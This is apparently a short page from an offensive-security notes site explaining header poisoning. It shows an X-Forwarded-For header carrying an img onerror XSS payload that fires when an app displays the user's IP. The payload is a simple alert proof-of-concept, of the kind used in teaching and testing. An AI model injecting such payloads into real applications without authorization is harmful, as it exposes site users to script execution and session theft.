search

Header Poisoning (WIP)

Sometimes headers could be injected with XSS when its content is used directly in some functionalities of the app.

Here we find an example of this scenario:

  • An application has a See Your IP functionality which retrieves the information of the user's IP via the X-Forwarded-For header.

Example Request
GET http://$url HTTP/1.1
host: host
X-Forwarded-For: $IP
...

  • We can inject JavaScript code, so when this function is triggered, the payload will be executed

Example Request
GET http://$url HTTP/1.1
host: host
X-Forwarded-For: <img src=x onerror='alert("HACKED")'/>
...
PreviousAbuse File Upload (WIP)NextHTTP Parameter Pollution (WIP)

Last updated